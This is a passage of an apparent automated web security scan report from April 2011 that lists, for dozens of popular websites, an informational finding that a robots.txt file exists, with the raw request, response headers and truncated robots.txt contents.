Date: Sat, 02 Apr 2011 14:13:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 25 Aug 2010 21:29:47 GMT
Accept-Ranges: bytes
Content-Length: 507
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:05 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for www.43things.com
#

User-agent: msnbot
Disallow: /admin
Disallow: /auth
Disallow: /invitations
Disallow: /mailing_list
Disallow: /twinkler/add
Crawl-delay: 20

User-agent: twiceler
C
...[SNIP]...
24.13. http://www.4chan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4chan.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4chan.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:11 GMT
Server: Apache
Last-Modified: Tue, 12 Jan 2010 20:08:19 GMT
ETag: "8a005-11a-47cfd370cd2c0"
Accept-Ranges: bytes
Content-Length: 282
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow:
User-agent: MSNBot
Disallow:
User-agent: Slurp
Disallow:
User-agent: Googlebot-Image
Disallow: /
User-agent: Googlebot-Mobile
Disallow: /
User-agent: Mediapartners-G
...[SNIP]...
24.14. http://www.4tubemate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubemate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4tubemate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:33 GMT
Server: Apache
Content-Length: 38
Last-Modified: Sat, 05 Feb 2011 00:52:06 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: text/plain

user-agent: *
disallow: /myalerts.php
24.15. http://www.6pm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6pm.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: text/plain
Cteonnt-Length: 759
Last-Modified: Wed, 02 Feb 2011 03:43:44 GMT
Cache-Control: private, max-age=28135170
Date: Sat, 02 Apr 2011 14:06:08 GMT
Content-Length: 759
Connection: close

User-agent: *
Disallow: /r/
Disallow: /bin/
Disallow: /n/howtophone.cgi
Disallow: /n/multi_view.cgi
Disallow: /n/redirect.cgi
Disallow: /noauth/redirect.cgi
Disallow: /n/sc
Disallow: /multiview
Disall
...[SNIP]...
24.16. http://www.800notes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.800notes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.800notes.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:57:38 GMT
Connection: close
Content-Length: 152

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /~sys~/
Disallow: /%7esys%7e/
Disallow: /nb/
Disallow: /awl/
Disallow: /forum/nb/
24.17. http://www.aaa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aaa.com

Response

HTTP/1.1 200 OK
Content-Length: 431
Content-Type: text/plain
Last-Modified: Wed, 17 Feb 2010 09:06:03 GMT
Accept-Ranges: bytes
ETag: "884f976eb0afca1:6145c"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:06 GMT
Connection: close

# For domain: http://www.aaa.com

User-agent: *
Disallow: /scripts/WebObjects.dll/*
User-agent: googlebot
Disallow: /scripts/WebObjects.dll/*
Allow: /scripts/WebObjects.dll/*page=*
User-agent
...[SNIP]...
24.18. http://www.aarp.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aarp.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:12 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 13:14:37 GMT
Accept-Ranges: bytes
Content-Length: 57
Vary: Accept-Encoding
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Keep-Alive: timeout=15, max=6
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

User-Agent: gsa-crawler
Disallow: /applications/search/
24.19. http://www.abebooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abebooks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abebooks.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 24 Mar 2010 17:55:41 GMT
ETag: "85263-6df-4828fa3730140"-gzip
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 14:11:44 GMT
Date: Sat, 02 Apr 2011 13:56:44 GMT
Content-Length: 1759
Connection: close

User-agent: *
Disallow: /servlet/
Disallow: /abe/
Disallow: /abep/
Disallow: /cgi/
Disallow: /search/
Disallow: /docs/Newsletters/BD
Disallow: /es/docs/BooksellerCentral/informativos

User-ag
...[SNIP]...
24.20. http://www.about.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.about.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/plain

# robots.txt for Sites
# Do Not delete this file.

User-agent: *
Disallow: /cgi/
Disallow: /gi/
Disallow: /library/nosearch/
Disallow: /zadz/
Disallow: /zdynahubz/
Disallow: /zeventsz/
Disallow: /zfre
...[SNIP]...
24.21. http://www.aboutus.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aboutus.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:42:59 GMT
Content-Type: text/plain
Content-Length: 1211
Last-Modified: Sat, 02 Apr 2011 00:32:54 GMT
Connection: close
X-node-id: rogue
Accept-Ranges: bytes
Set-Cookie: SERVERID=rogue; path=/

User-agent: Orthogaffe
Disallow: /

User-agent: UbiCrawler
Disallow: /

User-agent: DOC
Disallow: /

User-agent: Zao
Disallow: /

User-agent: sitecheck.internetseer.com
Disallow: /

User-agent: Zealbo
...[SNIP]...
24.22. http://www.accesshollywood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: text/plain
Content-Length: 50
X-Aicache-OS: 64.210.193.116:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

user-agent: *
disallow: /modules/fetch_module.php
24.23. http://www.accuweather.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Content-Length: 1893
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /adc2004/
Disallow: /MMWIP/
Disallow: /m/storm.aspx
Disallow: /m/US/weather.aspx
Disallow: /m/US/radar.aspx
Disall
...[SNIP]...
24.24. http://www.acehardware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:39 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 30 Jun 2009 08:45:06 GMT
ETag: "4e4490-1f5-46d8cd2c7c880"
Accept-Ranges: bytes
Content-Length: 501
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:06:39 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...
24.25. http://www.aceshowbiz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aceshowbiz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aceshowbiz.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 03 Dec 2008 03:31:08 GMT
ETag: "1280019-54-45d1c131d5700"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: Teleport Pro/1.29
Disallow:
24.26. http://www.active.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.active.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.active.com

Response

HTTP/1.0 200 OK
Content-Length: 603
Content-Type: text/plain
Last-Modified: Tue, 08 Mar 2011 22:15:08 GMT
Accept-Ranges: bytes
ETag: "1CBDDDE488EFE00:1CBEBFFD7BCCCAE"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-ACMCache: ReasonNotCached: NoPolicy.
Expires: Sat, 02 Apr 2011 13:45:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:45:19 GMT
Connection: close

User-agent: *
Disallow: /CM/
Disallow: /admin
Disallow: /explorer
Disallow: /myactive
Disallow: /register
Disallow: /archive
Disallow: /bids
Disallow: /datafeeds
Disallow: /desktop_xml
Disa
...[SNIP]...
24.27. http://www.addictinggames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Thu, 24 Feb 2011 18:34:27 GMT
ETag: "10efc02e8-4a-49d0b769ea961"
Accept-Ranges: bytes
Content-Length: 74
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.addictinggames.com/sitemap.xml
24.28. http://www.adobe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:16 GMT
ETag: "501-fb4f1300"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 07:43:51 GMT
Content-Type: text/plain
Connection: close
Date: Sat, 02 Apr 2011 12:37:36 GMT
Age: 303
Content-Length: 1281

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...
24.29. http://www.adp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adp.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QXZQWRSaprodadpws02CKYOQ; path=/
Content-Length: 7930
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 17:52:36 GMT
Accept-Ranges: bytes
ETag: "323e8af8eb42cb1:d1a9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:44 GMT
Connection: close

User-agent: *
Disallow: /mobile/run
Disallow: /en-ca/solutions/employer-services/comprehensive-outsourcing-services/large-business.aspx
Disallow: /fr-ca/solutions/employer-services/comprehensive-ou
...[SNIP]...
24.30. http://www.adriver.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:33 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 17:10:12 GMT
ETag: "45abb1-2bc-496fd4f874500"
Accept-Ranges: bytes
Content-Length: 700
Connection: close
Content-Type: text/plain; charset=windows-1251

# NetCat 2 Robots file
User-agent: *
Disallow: /netcat/
Disallow: /install/
Disallow: /search/

# Disallow pages
Disallow: /agency/test/questions/
Disallow: /agency/list/
Disallow: /publisher/trafficp
...[SNIP]...
24.31. http://www.advanceautoparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.advanceautoparts.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 01 Oct 2010 23:11:38 GMT
ETag: "556a7-111-4919651107e80"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 273
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

User-agent: *
Disallow: */content_privacypolicy*
Disallow: */LogonForm*
Disallow: */ForgotPasswordView*
Disallow: */UserRegistrationForm*
Disallow: */Address*
Disallow: */TemporaryPasswordSentForm
Dis
...[SNIP]...
24.32. http://www.ae.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ae.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ae.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 13 Jan 2011 21:41:58 GMT
ETag: "b6-499c12fe33580"
Accept-Ranges: bytes
Content-Length: 182
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:35 GMT
Connection: close

User-agent: *
Disallow: /web/trackorder/
Disallow: /77kids/trackorder/
Disallow: /aerie/trackorder/
Disallow: /web/myaccount/
Disallow: /77kids/myaccount/
Disallow: /aerie/myaccount/
24.33. http://www.aeropostale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aeropostale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aeropostale.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:10 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 22 Dec 2010 09:47:00 GMT
ETag: "4fc15a-14e-497fca2756d00"
Accept-Ranges: bytes
Content-Length: 334
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:39:10 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /compare/
Disallow: /cart/
Disallow: /include/
Disallow: /coreg/
Disallow: /ControllerServlet/
Disallow: /cartHandler/
Disallow: /emailHandler/
Disallow: /checkout/
Disallow
...[SNIP]...
24.34. http://www.af.mil/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.af.mil
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.af.mil

Response

HTTP/1.0 200 OK
Content-Length: 161
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 17:19:42 GMT
Accept-Ranges: bytes
ETag: "d42fd2e67cb2cb1:58d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:34 GMT
Connection: close

User-agent: *
Crawl-delay: 10
Disallow: /photos/media_email.asp
Disallow: /news/story_email.asp
Disallow: /news/video/
Disallow: /rss/
Disallow: /search/
24.35. http://www.agame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agame.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.agame.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:41:13 GMT
Connection: close
Content-Length: 25

User-agent: *
Allow: /
24.36. http://www.alaskaair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alaskaair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alaskaair.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 53
Content-Type: text/plain
Last-Modified: Mon, 13 Jul 2009 20:20:40 GMT
Accept-Ranges: bytes
ETag: "01cd263f73ca1:296"
Server: Alaska Airlines
X-Powered-By: Airlines
Date: Sat, 02 Apr 2011 14:12:37 GMT
Connection: close

User-agent: *
Disallow: /shopping/ssl/FareRules.aspx
24.37. http://www.alexa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alexa.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "2411318070"
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 21:53:37 GMT
Content-Length: 3266
Date: Sat, 02 Apr 2011 13:37:05 GMT
Server: httpd

# The crawlers listed below are allowed on the Alexa site.
# Alexa allows other crawlers on a case by case basis.

#
# Alexa provides access to traffic ranking data via Amazon Web Services.
# More
...[SNIP]...
24.38. http://www.alibris.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibris.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alibris.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:34 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 17
Server: Apache
Last-Modified: Mon, 28 Feb 2011 22:31:04 GMT
Accept-Ranges: bytes
Content-Length: 556
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /account
Disallow: /classicalsearch
Disallow: /framework
Disallow: /moviesearch
Disallow: /musicsearch
Disallow: /popups
Disallow: /portals
Disallow: /printable
Disallow: /reso
...[SNIP]...
24.39. http://www.allbusiness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allbusiness.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:42 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 00:24:16 GMT
ETag: "185"
Accept-Ranges: bytes
Content-Length: 389
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

User-agent: *
Disallow: /print/
Disallow: /email/
Disallow: /relatedarticles/
Disallow: /blogs/
Disallow: /nospider/
Disallow: /4049960-1.html
Disallow: /advscripts/

Sitemap: http://www.allbusiness.c
...[SNIP]...
24.40. http://www.allposters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allposters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allposters.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 573
Content-Type: text/plain
Last-Modified: Fri, 26 Nov 2010 10:43:38 GMT
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=228650
Date: Sat, 02 Apr 2011 13:31:49 GMT
Content-Length: 573
Connection: close

User-agent: *
Disallow: /getposter.asp
Disallow: /GetPoster.asp
Disallow: /getPoster.asp
Disallow: /getthumb.asp
Disallow: /GetThumb.asp
Disallow: /getThumb.asp
Disallow: /ViewCart.asp
Disallo
...[SNIP]...
24.41. http://www.allrecipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allrecipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allrecipes.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 709
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2011 23:57:08 GMT
Accept-Ranges: bytes
ETag: "ecaf42daece8cb1:1386"
Server: Microsoft-IIS/6.0
X-Powered-By: WEB205
Date: Sat, 02 Apr 2011 13:25:16 GMT
Connection: close

User-agent: *
Disallow: /logout.ashx
Disallow: /Controls/
Disallow: /My/
Disallow: /Dev/
Disallow: /Help/AboutUs/Press/Logos/
Disallow: /Membership/
Disallow: /SupportingMembership/
Disallow:
...[SNIP]...
24.42. http://www.allvoices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:54 GMT
ETag: "290dbb-488-49fca40126480"
Accept-Ranges: bytes
Content-Length: 1160
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /compose
Disallow: /login
Disallow: /signup
Disallow: /inbox
Disallow: /edi
...[SNIP]...
24.43. http://www.ally.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ally.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:43:19 GMT
Content-Length: 64
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.ally.com/sitemap/
24.44. http://www.alphadictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphadictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alphadictionary.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Sun, 31 Jan 2010 20:42:05 GMT
ETag: "5a42d0-31-e6cb4140"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /sounds/
Crawl-delay: .5
24.45. http://www.altavista.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.altavista.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.altavista.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:54 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 25 Feb 2011 09:32:25 GMT
Accept-Ranges: bytes
Content-Length: 797
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

# Tells Scanning Robots Where They Are And Are Not Welcome
#
# User-agent:    can also specify by name; "*" is for everyone
# Disallow:    disallow if this matches first part of requested path
#            
# For no
...[SNIP]...
24.46. http://www.alumniclass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alumniclass.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alumniclass.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 25 Feb 2011 23:23:04 GMT
ETag: "320134-90-49d239ca65b06"
Accept-Ranges: bytes
Content-Length: 144
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
Disallow: /newsletters
http://www.alumniclass.com/web_sitemap_ac.xml.gz # Added by Google Sitemap Generator
24.47. http://www.amazon.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazon.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:09 GMT
Server: Server
Last-Modified: Mon, 21 Feb 2011 19:00:04 GMT
ETag: "600-78b2f500"
Accept-Ranges: bytes
Content-Length: 1536
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/plain
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in
Disallow: /exec/obid
...[SNIP]...
24.48. http://www.americanexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1301751216270517; path=/; expires=Tue, 05-Apr-16 13:33:36 GMT; domain=.americanexpress.com
Last-Modified: Tue, 14 Oct 2003 06:08:14 GMT
Accept-Ranges: bytes
Content-Length: 193
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# American Express
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
# Date By Reason
# 20011119 SEU Initial robots
User-agent: *
Disallow:

24.49. http://www.americangreetings.com/favicon.ico  previous  next

Summary

Severity:   Information
